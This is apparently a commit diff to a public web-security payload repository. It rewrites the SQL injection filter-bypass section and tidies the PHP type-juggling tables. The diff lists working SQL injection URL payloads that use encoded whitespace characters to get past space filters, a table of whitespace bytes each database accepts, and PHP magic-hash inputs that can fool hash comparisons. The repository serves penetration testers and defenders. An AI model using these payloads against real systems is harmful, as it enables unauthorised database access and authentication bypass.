SQL injection - Generic Bypass (Space)

README.md

@@ -2,9 +2,8 @@
 
 A list of useful payloads and bypasses for Web Application Security.
 Feel free to improve with your payloads and techniques !
-I :heart: pull requests :)
 
-You can also contribute with a :beers: IRL, or using the sponsor button
+You can also contribute with a :beers: IRL, or using the sponsor button.
 
 [![Sponsor](https://img.shields.io/static/v1?label=Sponsor&message=%E2%9D%A4&logo=GitHub&link=https://github.com/sponsors/swisskyrepo)](https://github.com/sponsors/swisskyrepo)
 [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)

SQL Injection/README.md

@@ -31,7 +31,7 @@
 * [Second Order SQL Injection](#second-order-sql-injection)
 * [PDO Prepared Statements](#pdo-prepared-statements)
 * [Generic WAF Bypass](#generic-waf-bypass)
-    * [White Spaces](#white-spaces)
+    * [No Space Allowed](#no-space-allowed)
     * [No Comma Allowed](#no-comma-allowed)
     * [No Equal Allowed](#no-equal-allowed)
     * [Case Modification](#case-modification)
@@ -439,30 +439,37 @@ PDO allows for binding of input parameters, which ensures that user data is prop
 
 ## Generic WAF Bypass
 
-### White Spaces
+### No Space Allowed
 
-Bypass using whitespace alternatives.
+Some web applications attempt to secure their SQL queries by blocking or stripping space characters to prevent simple SQL injection attacks. However, attackers can bypass these filters by using alternative whitespace characters, comments, or creative use of parentheses.
 
-| Bypass                   | Technique              |
+#### Alternative Whitespace Characters
-| ------------------------ | ---------------------- |
-| `?id=1%09and%091=1%09--` | Whitespace alternative |
-| `?id=1%0Aand%0A1=1%0A--` | Whitespace alternative |
-| `?id=1%0Band%0B1=1%0B--` | Whitespace alternative |
-| `?id=1%0Cand%0C1=1%0C--` | Whitespace alternative |
-| `?id=1%0Dand%0D1=1%0D--` | Whitespace alternative |
-| `?id=1%A0and%A01=1%A0--` | Whitespace alternative |
-| `?id=1%A0and%A01=1%A0--` | Whitespace alternative |
 
-| DBMS       | ASCII characters in hexadecimal |
+Most databases interpret certain ASCII control characters and encoded spaces (such as tabs, newlines, etc.) as whitespace in SQL statements. By encoding these characters, attackers can often evade space-based filters.
-| ---------- | ------------------------------- |
-| SQLite3    | 0A, 0D, 0C, 09, 20 |
-| MySQL 5    | 09, 0A, 0B, 0C, 0D, A0, 20 |
-| MySQL 3    | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0 |
-| PostgreSQL | 0A, 0D, 0C, 09, 20 |
-| Oracle 11g | 00, 0A, 0D, 0C, 09, 20 |
-| MSSQL      | 01, 02, 03, 04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E, 0F, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 1A, 1B, 1C, 1D, 1E, 1F, 20 |
 
-Bypass using comments and parenthesis.
+| Example Payload               | Description                      |
+|-------------------------------|----------------------------------|
+| `?id=1%09and%091=1%09--`      | `%09` is tab (`\t`)              |
+| `?id=1%0Aand%0A1=1%0A--`      | `%0A` is line feed (`\n`)        |
+| `?id=1%0Band%0B1=1%0B--`      | `%0B` is vertical tab            |
+| `?id=1%0Cand%0C1=1%0C--`      | `%0C` is form feed               |
+| `?id=1%0Dand%0D1=1%0D--`      | `%0D` is carriage return (`\r`)  |
+| `?id=1%A0and%A01=1%A0--`      | `%A0` is non-breaking space      |
+
+**ASCII Whitespace Support by Database**:
+
+| DBMS         | Supported Whitespace Characters (Hex)            |
+|--------------|----------------------------------------------___-|
+| SQLite3      | 0A, 0D, 0C, 09, 20                               |
+| MySQL 5      | 09, 0A, 0B, 0C, 0D, A0, 20                       |
+| MySQL 3      | 01–1F, 20, 7F, 80, 81, 88, 8D, 8F, 90, 98, 9D, A0|
+| PostgreSQL   | 0A, 0D, 0C, 09, 20                               |
+| Oracle 11g   | 00, 0A, 0D, 0C, 09, 20                           |
+| MSSQL        | 01–1F, 20                                        |
+
+#### Bypassing with Comments and Parentheses
+
+SQL allows comments and grouping, which can break up keywords and queries, thus defeating space filters:
 
 | Bypass                                    | Technique            |
 | ----------------------------------------- | -------------------- |

Type Juggling/README.md

@@ -27,14 +27,14 @@
 | `'0010e2'   == '1e3'`             | true |
 | `'0xABCdef' == ' 0xABCdef'`       | true (PHP 5.0) / false (PHP 7.0) |
 | `'0xABCdef' == '     0xABCdef'`   | true (PHP 5.0) / false (PHP 7.0) |
-| `'0x01'     == 1`             | true (PHP 5.0) / false (PHP 7.0) |
+| `'0x01'     == 1`                 | true (PHP 5.0) / false (PHP 7.0) |
 | `'0x1234Ab' == '1193131'`         | true (PHP 5.0) / false (PHP 7.0) |
 | `'123'  == 123`                   | true |
 | `'123a' == 123`                   | true |
 | `'abc'  == 0`                     | true |
 | `'' == 0 == false == NULL`        | true |
 | `'' == 0`                         | true |
-| `0  == false`                    | true |
+| `0  == false`                     | true |
 | `false == NULL`                   | true |
 | `NULL == ''`                      | true |
 
@@ -65,7 +65,7 @@ Loose Type comparisons occurs in many languages:
 > Magic hashes arise due to a quirk in PHP's type juggling, when comparing string hashes to integers. If a string hash starts with "0e" followed by only numbers, PHP interprets this as scientific notation and the hash is treated as a float in comparison operations.
 
 | Hash | "Magic" Number / String    | Magic Hash                                    | Found By / Description      |
-| ---- | -------------------------- |:---------------------------------------------:| -------------:|
+| ---- | -------------------------- | --------------------------------------------- | -------------|
 | MD4  | gH0nAdHk                   | 0e096229559581069251163783434175              | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
 | MD4  | IiF+hTai                   | 00e90130237707355082822449868597              | [@spaze](https://github.com/spaze/hashes/blob/master/md4.md) |
 | MD5  | 240610708                  | 0e462097431906509019562988736854              | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
@@ -73,7 +73,10 @@ Loose Type comparisons occurs in many languages:
 | MD5  | 0e1137126905               | 0e291659922323405260514745084877              | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
 | MD5  | 0e215962017                | 0e291242476940776845150308577824              | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
 | MD5  | 129581926211651571912466741651878684928                | 06da5430449f8f6f23dfc1276f722738              | Raw: ?T0D??o#??'or'8.N=? |
-| SHA1 | 10932435112                | 0e07766915004133176347055865026311692244      | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
+
+| Hash | "Magic" Number / String    | Magic Hash                                    | Found By / Description      |
+| ---- | -------------------------- | --------------------------------------------- | -------------|
+| SHA1 | 10932435112                | 0e07766915004133176347055865026311692244      | Michael A. Cleverly, Michele Spagnuolo & Rogdham |
 | SHA-224 | 10885164793773          | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) |
 | SHA-256 | 34250003024812          | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |
 | SHA-256 | TyNOQHUS                | 0e66298694359207596086558843543959518835691168370379069085300385 | [@Chick3nman512](https://twitter.com/Chick3nman512/status/1150137800324526083) |